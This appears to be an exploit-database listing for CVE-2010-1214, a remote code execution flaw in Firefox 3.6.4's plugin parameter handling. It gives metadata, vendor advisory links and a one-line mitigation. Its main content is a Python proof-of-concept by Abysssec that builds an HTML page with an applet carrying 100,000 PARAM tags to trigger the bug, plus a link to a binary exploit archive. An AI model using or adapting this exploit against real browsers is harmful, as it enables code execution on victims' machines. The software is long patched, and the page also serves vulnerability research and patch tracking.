header-logo
Suggest Exploit
vendor:
Firefox
by:
Unknown
9
CVSS
CRITICAL
Remote Code Execution
CWE
Product Name: Firefox
Affected Version From: Firefox 3.6.4
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2010-1214
CPE: a:mozilla:firefox:3.6.4
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/suse-sa-2010-032/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0546/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0547/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/mfsa2010-48-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-930-6/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-957-2/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-c2eac2b5-9a7d-11df-8e32-000f20797ede/https://www.rapid7.com/db/vulnerabilities/mfsa2010-37-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/mfsa2010-48-dangling-pointer-crash-regression-from-plugin-parameter-array-fix/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0544/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0545/
Other Scripts:
Platforms Tested:
2010

Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution

This exploit allows remote attackers to execute arbitrary code on a system with Firefox 3.6.4 by exploiting a vulnerability in the Firefox plugin parameter EnsureCachedAttrParamArrays.

Mitigation:

Upgrade to a version of Firefox that is not affected by this vulnerability.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34358.zip (moaub-17-exploit.zip)
'''
'''
  Title              :  Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
  Version            :  Firefox 3.6.4
  Analysis           :  http://www.abysssec.com
  Vendor             :  http://www.mozilla.com
  Impact             :  Critical
  Contact            :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter            :  @abysssec
  CVE                :  CVE-2010-1214
  
'''

import sys;

myStyle = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>page demonstration</title>
<link rel="stylesheet" type="text/css" href="style2.css" />


</head>
<body id='msg'>


    <applet code = 'appletComponentArch.DynamicTreeApplet'   archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >

"""
i=0
while(i<100000):
    myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";
    i=i+1

myStyle = myStyle + """
	</applet>

</body>
</html>
"""
cssFile = open("Abysssec.html","w")
cssFile.write(myStyle)
cssFile.close()

Navigation

Suggest Exploit

Services By CQR